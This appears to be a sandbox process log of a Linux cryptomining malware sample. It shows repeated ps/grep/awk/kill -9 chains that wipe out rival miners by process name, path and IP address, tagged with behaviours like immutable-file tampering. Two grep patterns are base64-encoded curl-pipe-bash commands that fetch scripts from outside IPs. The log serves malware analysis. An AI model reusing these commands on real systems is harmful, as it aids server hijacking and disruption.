/bin/grep  grep -v grep  2⤵  PID:1876
/bin/ps  ps aux  2⤵  PID:1875
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1884
/usr/bin/awk  awk "{print \$2}"  2⤵  PID:1883
/bin/grep  grep "/tmp/jmx*"  2⤵  PID:1882
/bin/grep  grep -v grep  2⤵  PID:1881
/bin/ps  ps aux  2⤵  PID:1880
- Process Discovery
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1889
/usr/bin/awk  awk "{print \$2}"  2⤵  PID:1888
/bin/grep  grep "/tmp/2Ne80*"  2⤵  PID:1887
/bin/grep  grep -v grep  2⤵  PID:1886
/bin/ps  ps aux  2⤵  PID:1885
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1894
/usr/bin/awk  awk "{print \$2}"  2⤵  PID:1893
/bin/grep  grep IOFoqIgyC0zmf2UR  2⤵  PID:1892
/bin/grep  grep -v grep  2⤵  PID:1891
/bin/ps  ps aux  2⤵  PID:1890
- Process Discovery
/usr/bin/xargs  xargs -I "%" kill -9 "%"  2⤵  PID:1899
/usr/bin/awk  awk "{print \$2}"  2⤵  PID:1898
-
/bin/grepgrep 45.76.122.922⤵PID:1897
-
/bin/grepgrep -v grep2⤵PID:1896
-
/bin/psps aux2⤵
- Process Discovery
PID:1895 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1904 -
/usr/bin/awkawk "{print \$2}"2⤵PID:1903
-
/bin/grepgrep 51.38.191.1782⤵PID:1902
-
/bin/grepgrep -v grep2⤵PID:1901
-
/bin/psps aux2⤵
- Process Discovery
PID:1900 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1909
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1908
-
/bin/grepgrep 51.15.56.1612⤵PID:1907
-
/bin/grepgrep -v grep2⤵PID:1906
-
/bin/psps aux2⤵
- Process Discovery
PID:1905 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1914
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1913
-
/bin/grepgrep 86s.jpg2⤵PID:1912
-
/bin/grepgrep -v grep2⤵PID:1911
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1910 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1919
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1918
-
/bin/grepgrep aGTSGJJp2⤵PID:1917
-
/bin/grepgrep -v grep2⤵PID:1916
-
/bin/psps aux2⤵
- Process Discovery
PID:1915 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1924
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1923
-
/bin/grepgrep nMrfmnRa2⤵PID:1922
-
/bin/grepgrep -v grep2⤵PID:1921
-
/bin/psps aux2⤵PID:1920
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1929 -
/usr/bin/awkawk "{print \$2}"2⤵PID:1928
-
/bin/grepgrep PuNY5tm22⤵PID:1927
-
/bin/grepgrep -v grep2⤵PID:1926
-
/bin/psps aux2⤵PID:1925
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1934 -
/usr/bin/awkawk "{print \$2}"2⤵PID:1933
-
/bin/grepgrep I0r8Jyyt2⤵PID:1932
-
/bin/grepgrep -v grep2⤵PID:1931
-
/bin/psps aux2⤵
- Process Discovery
PID:1930 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1939
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1938
-
/bin/grepgrep AgdgACUD2⤵PID:1937
-
/bin/grepgrep -v grep2⤵PID:1936
-
/bin/psps aux2⤵PID:1935
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1944
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1943
-
/bin/grepgrep uiZvwxG82⤵PID:1942
-
/bin/grepgrep -v grep2⤵PID:1941
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1940 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1949
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1948
-
/bin/grepgrep hahwNEdB2⤵PID:1947
-
/bin/grepgrep -v grep2⤵PID:1946
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1945 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1954
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1953
-
/bin/grepgrep BtwXn5qH2⤵PID:1952
-
/bin/grepgrep -v grep2⤵PID:1951
-
/bin/psps aux2⤵PID:1950
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1959
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1958
-
/bin/grepgrep 3XEzey2T2⤵PID:1957
-
/bin/grepgrep -v grep2⤵PID:1956
-
/bin/psps aux2⤵
- Process Discovery
PID:1955 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1964
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1963
-
/bin/grepgrep t2tKrCSZ2⤵PID:1962
-
/bin/grepgrep -v grep2⤵PID:1961
-
/bin/psps aux2⤵
- Reads runtime system information
PID:1960 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1969 -
/usr/bin/awkawk "{print \$2}"2⤵PID:1968
-
/bin/grepgrep HD7fcBgg2⤵PID:1967
-
/bin/grepgrep -v grep2⤵PID:1966
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1965 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1974
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1973
-
/bin/grepgrep zXcDajSs2⤵PID:1972
-
/bin/grepgrep -v grep2⤵PID:1971
-
/bin/psps aux2⤵
- Process Discovery
PID:1970 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1979
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1978
-
/bin/grepgrep 3lmigMo2⤵PID:1977
-
/bin/grepgrep -v grep2⤵PID:1976
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1975 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1984
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1983
-
/bin/grepgrep AkMK4A22⤵PID:1982
-
/bin/grepgrep -v grep2⤵PID:1981
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1980 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1989
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1988
-
/bin/grepgrep AJ2AkKe2⤵PID:1987
-
/bin/grepgrep -v grep2⤵PID:1986
-
/bin/psps aux2⤵
- Reads runtime system information
PID:1985 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1994 -
/usr/bin/awkawk "{print \$2}"2⤵PID:1993
-
/bin/grepgrep HiPxCJRS2⤵
- System Network Configuration Discovery
PID:1992 -
/bin/grepgrep -v grep2⤵PID:1991
-
/bin/psps aux2⤵
- Process Discovery
PID:1990 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1999
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1998
-
/bin/grepgrep http_0xCC0302⤵PID:1997
-
/bin/grepgrep -v grep2⤵PID:1996
-
/bin/psps aux2⤵PID:1995
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2004
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2003
-
/bin/grepgrep http_0xCC0312⤵PID:2002
-
/bin/grepgrep -v grep2⤵PID:2001
-
/bin/psps aux2⤵
- Process Discovery
PID:2000 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2009 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2008
-
/bin/grepgrep http_0xCC0322⤵PID:2007
-
/bin/grepgrep -v grep2⤵PID:2006
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:2005 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2014
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2013
-
/bin/grepgrep http_0xCC0332⤵PID:2012
-
/bin/grepgrep -v grep2⤵PID:2011
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2010 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2019 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2018
-
/bin/grepgrep C4iLM4L2⤵PID:2017
-
/bin/grepgrep -v grep2⤵PID:2016
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:2015 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2024
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2023
-
/bin/grepgrep aziplcr72qjhzvin2⤵
- System Network Configuration Discovery
PID:2022 -
/bin/grepgrep -v grep2⤵PID:2021
-
/bin/psps aux2⤵
- Process Discovery
PID:2020 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2028
-
/usr/bin/awkawk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"2⤵PID:2027
-
/bin/grepgrep -v grep2⤵PID:2026
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2025 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2033 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2032
-
/bin/grepgrep /boot/vmlinuz2⤵PID:2031
-
/bin/grepgrep -v grep2⤵PID:2030
-
/bin/psps aux2⤵PID:2029
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2038
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2037
-
/bin/grepgrep i4b503a52cc52⤵PID:2036
-
/bin/grepgrep -v grep2⤵PID:2035
-
/bin/psps aux2⤵
- Process Discovery
PID:2034 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2043 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2042
-
/bin/grepgrep dgqtrcst23rtdi3ldqk322j22⤵PID:2041
-
/bin/grepgrep -v grep2⤵PID:2040
-
/bin/psps aux2⤵
- Process Discovery
PID:2039 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2048 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2047
-
/bin/grepgrep 2g0uv7npuhrlatd2⤵PID:2046
-
/bin/grepgrep -v grep2⤵PID:2045
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2044 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2053
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2052
-
/bin/grepgrep nqscheduler2⤵PID:2051
-
/bin/grepgrep -v grep2⤵PID:2050
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2049 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2058
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2057
-
/bin/grepgrep rkebbwgqpl4npmm2⤵PID:2056
-
/bin/grepgrep -v grep2⤵PID:2055
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:2054 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2064
-
/usr/local/sbin/killkill -9 14663⤵PID:2065
-
/usr/local/bin/killkill -9 14663⤵PID:2065
-
/usr/sbin/killkill -9 14663⤵PID:2065
-
/usr/bin/killkill -9 14663⤵PID:2065
-
/sbin/killkill -9 14663⤵PID:2065
-
/bin/killkill -9 14663⤵
- Reads CPU attributes
PID:2065 -
/usr/bin/awkawk "\$3>10.0{print \$2}"2⤵PID:2063
-
/bin/grepgrep "]"2⤵PID:2062
-
/bin/grepgrep -v aux2⤵PID:2061
-
/bin/grepgrep -v grep2⤵PID:2060
-
/bin/psps aux2⤵
- Reads runtime system information
PID:2059 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2070
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2069
-
/bin/grepgrep 2fhtu70teuhtoh78jc5s2⤵PID:2068
-
/bin/grepgrep -v grep2⤵PID:2067
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:2066 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2075
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2074
-
/bin/grepgrep 0kwti6ut420t2⤵PID:2073
-
/bin/grepgrep -v grep2⤵PID:2072
-
/bin/psps aux2⤵PID:2071
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2080
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2079
-
/bin/grepgrep 44ct7udt0patws3agkdfqnjm2⤵PID:2078
-
/bin/grepgrep -v grep2⤵PID:2077
-
/bin/psps aux2⤵
- Process Discovery
PID:2076 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2087
-
/usr/bin/awkawk "length(\$11)>19{print \$2}"2⤵PID:2086
-
/bin/grepgrep -v _2⤵PID:2085
-
/bin/grepgrep -v -2⤵PID:2084
-
/bin/grepgrep -v /2⤵PID:2083
-
/bin/grepgrep -v grep2⤵PID:2082
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:2081 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2092
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2091
-
/bin/grepgrep "\\[^"2⤵PID:2090
-
/bin/grepgrep -v grep2⤵PID:2089
-
/bin/psps aux2⤵PID:2088
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2097
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2096
-
/bin/grepgrep rsync2⤵PID:2095
-
/bin/grepgrep -v grep2⤵PID:2094
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:2093 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2102
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2101
-
/bin/grepgrep watchd0g2⤵PID:2100
-
/bin/grepgrep -v grep2⤵PID:2099
-
/bin/psps aux2⤵
- Process Discovery
PID:2098 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2107
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2106
-
/bin/egrepegrep "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:2105
-
/bin/grepgrep -v grep2⤵PID:2104
-
/usr/local/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:2105
-
/usr/local/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:2105
-
/usr/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:2105
-
/usr/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:2105
-
/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:2105
-
/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:2105
-
/bin/psps aux2⤵
- Process Discovery
PID:2103 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2112 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2111
-
/bin/grepgrep 158.69.133.18:82202⤵PID:2110
-
/bin/grepgrep -v grep2⤵PID:2109
-
/bin/psps aux2⤵
- Process Discovery
PID:2108 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2117
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2116
-
/bin/grepgrep /tmp/java2⤵PID:2115
-
/bin/grepgrep -v grep2⤵PID:2114
-
/bin/psps aux2⤵PID:2113
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2122
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2121
-
/bin/grepgrep gitee.com2⤵PID:2120
-
/bin/grepgrep -v grep2⤵PID:2119
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:2118 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2127
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2126
-
/bin/grepgrep /tmp/java2⤵PID:2125
-
/bin/grepgrep -v grep2⤵PID:2124
-
/bin/psps aux2⤵
- Process Discovery
PID:2123 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2137 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2136
-
/bin/grepgrep 104.248.4.1622⤵PID:2135
-
/bin/grepgrep -v grep2⤵PID:2134
-
/bin/psps aux2⤵
- Process Discovery
PID:2133 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2144 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2143
-
/bin/grepgrep 89.35.39.782⤵PID:2142
-
/bin/grepgrep -v grep2⤵PID:2141
-
/bin/psps aux2⤵
- Reads runtime system information
PID:2140 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2149
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2148
-
/bin/grepgrep /dev/shm/z3.sh2⤵PID:2147
-
/bin/grepgrep -v grep2⤵PID:2146
-
/bin/psps aux2⤵PID:2145
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2155
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2154
-
/bin/grepgrep kthrotlds2⤵PID:2153
-
/bin/grepgrep -v grep2⤵PID:2152
-
/bin/psps aux2⤵
- Process Discovery
PID:2151 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2160
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2159
-
/bin/grepgrep ksoftirqds2⤵PID:2158
-
/bin/grepgrep -v grep2⤵PID:2157
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2156 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2165
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2164
-
/bin/grepgrep netdns2⤵PID:2163
-
/bin/grepgrep -v grep2⤵PID:2162
-
/bin/psps aux2⤵PID:2161
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2170
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2169
-
/bin/grepgrep watchdogs2⤵PID:2168
-
/bin/grepgrep -v grep2⤵PID:2167
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2166 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2181 -
/usr/bin/awkawk "\$3>80.0{print \$2}"2⤵PID:2180
-
/bin/grepgrep -v atd2⤵PID:2178
-
/bin/grepgrep -v salt-minions2⤵PID:2179
-
/bin/grepgrep -v apache22⤵PID:2177
-
/bin/grepgrep -v dblaunched2⤵PID:2176
-
/bin/grepgrep -v dblaunchs2⤵PID:2175
-
/bin/grepgrep -v dblaunch2⤵PID:2174
-
/bin/grepgrep -v root2⤵PID:2173
-
/bin/grepgrep -v grep2⤵PID:2172
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:2171 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2187
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2186
-
/bin/grepgrep " ps"2⤵PID:2185
-
/bin/grepgrep -v aux2⤵PID:2184
-
/bin/grepgrep -v grep2⤵PID:2183
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:2182 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2192
-
/usr/bin/cutcut -c 9-152⤵PID:2191
-
/bin/grepgrep sync_supers2⤵PID:2190
-
/bin/grepgrep -v grep2⤵PID:2189
-
/bin/psps aux2⤵
- Process Discovery
PID:2188 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2197 -
/usr/bin/cutcut -c 9-152⤵PID:2196
-
/bin/grepgrep cpuset2⤵PID:2195
-
/bin/grepgrep -v grep2⤵PID:2194
-
/bin/psps aux2⤵PID:2193
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2203
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2202
-
/bin/grepgrep "x]"2⤵PID:2201
-
/bin/grepgrep -v aux2⤵PID:2200
-
/bin/grepgrep -v grep2⤵PID:2199
-
/bin/psps aux2⤵
- Process Discovery
PID:2198 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2209 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2208
-
/bin/grepgrep "sh] <"2⤵PID:2207
-
/bin/grepgrep -v aux2⤵PID:2206
-
/bin/grepgrep -v grep2⤵PID:2205
-
/bin/psps aux2⤵
- Reads runtime system information
PID:2204 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2215
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2214
-
/bin/grepgrep " \\[]"2⤵PID:2213
-
/bin/grepgrep -v aux2⤵PID:2212
-
/bin/grepgrep -v grep2⤵PID:2211
-
/bin/psps aux2⤵
- Reads runtime system information
PID:2210 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2220
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2219
-
/bin/grepgrep /tmp/l.sh2⤵PID:2218
-
/bin/grepgrep -v grep2⤵PID:2217
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2216 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2225
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2224
-
/bin/grepgrep /tmp/zmcat2⤵PID:2223
-
/bin/grepgrep -v grep2⤵PID:2222
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2221 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2230
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2229
-
/bin/grepgrep hahwNEdB2⤵PID:2228
-
/bin/grepgrep -v grep2⤵PID:2227
-
/bin/psps aux2⤵PID:2226
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2235
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2234
-
/bin/grepgrep CnzFVPLF2⤵PID:2233
-
/bin/grepgrep -v grep2⤵PID:2232
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:2231 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2240
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2239
-
/bin/grepgrep CvKzzZLs2⤵PID:2238
-
/bin/grepgrep -v grep2⤵PID:2237
-
/bin/psps aux2⤵
- Reads runtime system information
PID:2236 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2245
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2244
-
/bin/grepgrep aziplcr72qjhzvin2⤵
- System Network Configuration Discovery
PID:2243 -
/bin/grepgrep -v grep2⤵PID:2242
-
/bin/psps aux2⤵
- Reads runtime system information
PID:2241 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2250
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2249
-
/bin/grepgrep /tmp/udevd2⤵PID:2248
-
/bin/grepgrep -v grep2⤵PID:2247
-
/bin/psps aux2⤵
- Reads runtime system information
PID:2246 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2255
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2254
-
/bin/grepgrep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA2⤵PID:2253
-
/bin/grepgrep -v grep2⤵PID:2252
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:2251 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2260
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2259
-
/bin/grepgrep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo2⤵PID:2258
-
/bin/grepgrep -v grep2⤵PID:2257
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:2256 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2265
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2264
-
/bin/grepgrep sustse2⤵PID:2263
-
/bin/grepgrep -v grep2⤵PID:2262
-
/bin/psps aux2⤵
- Process Discovery
PID:2261 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2270
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2269
-
/bin/grepgrep sustse32⤵PID:2268
-
/bin/grepgrep -v grep2⤵PID:2267
-
/bin/psps aux2⤵PID:2266
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2276
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2275
-
/bin/grepgrep wget2⤵PID:2274
-
/bin/grepgrep mr.sh2⤵PID:2273
-
/bin/grepgrep -v grep2⤵PID:2272
-
/bin/psps aux2⤵
- Process Discovery
PID:2271 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2282
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2281
-
/bin/grepgrep curl2⤵PID:2280
-
/bin/grepgrep mr.sh2⤵PID:2279
-
/bin/grepgrep -v grep2⤵PID:2278
-
/bin/psps aux2⤵
- Process Discovery
PID:2277 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2288 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2287
-
/bin/grepgrep wget2⤵PID:2286
-
/bin/grepgrep 2mr.sh2⤵PID:2285
-
/bin/grepgrep -v grep2⤵PID:2284
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2283 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2294 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2293
-
/bin/grepgrep curl2⤵PID:2292
-
/bin/grepgrep 2mr.sh2⤵PID:2291
-
/bin/grepgrep -v grep2⤵PID:2290
-
/bin/psps aux2⤵PID:2289
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2300
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2299
-
/bin/grepgrep wget2⤵PID:2298
-
/bin/grepgrep cr5.sh2⤵PID:2297
-
/bin/grepgrep -v grep2⤵PID:2296
-
/bin/psps aux2⤵PID:2295
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2306
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2305
-
/bin/grepgrep curl2⤵PID:2304
-
/bin/grepgrep cr5.sh2⤵PID:2303
-
/bin/grepgrep -v grep2⤵PID:2302
-
/bin/psps aux2⤵PID:2301
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2312
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2311
-
/bin/grepgrep wget2⤵PID:2310
-
/bin/grepgrep logo9.jpg2⤵PID:2309
-
/bin/grepgrep -v grep2⤵PID:2308
-
/bin/psps aux2⤵
- Process Discovery
PID:2307 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2318
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2317
-
/bin/grepgrep curl2⤵PID:2316
-
/bin/grepgrep logo9.jpg2⤵PID:2315
-
/bin/grepgrep -v grep2⤵PID:2314
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2313 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2323 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2322
-
/bin/grepgrep j2.conf2⤵PID:2321
-
/bin/grepgrep -v grep2⤵PID:2320
-
/bin/psps aux2⤵PID:2319
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2329
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2328
-
/bin/grepgrep wget2⤵PID:2327
-
/bin/grepgrep luk-cpu2⤵PID:2326
-
/bin/grepgrep -v grep2⤵PID:2325
-
/bin/psps aux2⤵PID:2324
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2335 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2334
-
/bin/grepgrep curl2⤵PID:2333
-
/bin/grepgrep luk-cpu2⤵PID:2332
-
/bin/grepgrep -v grep2⤵PID:2331
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:2330 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2341
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2340
-
/bin/grepgrep wget2⤵PID:2339
-
/bin/grepgrep ficov2⤵PID:2338
-
/bin/grepgrep -v grep2⤵PID:2337
-
/bin/psps aux2⤵
- Process Discovery
PID:2336 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2347
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2346
-
/bin/grepgrep curl2⤵PID:2345
-
/bin/grepgrep ficov2⤵PID:2344
-
/bin/grepgrep -v grep2⤵PID:2343
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:2342 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2353
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2352
-
